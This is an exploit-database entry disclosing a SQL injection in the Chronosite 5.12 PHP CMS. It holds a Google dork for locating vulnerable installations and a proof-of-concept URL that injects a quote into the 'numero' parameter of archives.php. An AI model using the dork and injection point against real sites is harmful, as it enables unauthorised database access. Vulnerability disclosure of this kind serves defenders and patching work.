Chronosite 5.12 - SQL Injection

Author: Wadeek
type: webapps
platform: php
port: 
date_added: 2015-06-01 
date_updated: 2015-06-01 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt37500/screen-shot-2015-06-01-at-121908.png 
application_url: http://www.exploit-db.comchronosite_512.zip

# Exploit Title: Chronosite 5.12 SQL Injection
# Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site"
# Date: 13/05/15
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.chronosite.org/
# Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip
# Version: 5.12
# Tested on: Xampp on Windows7
################################################################
PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27
################################################################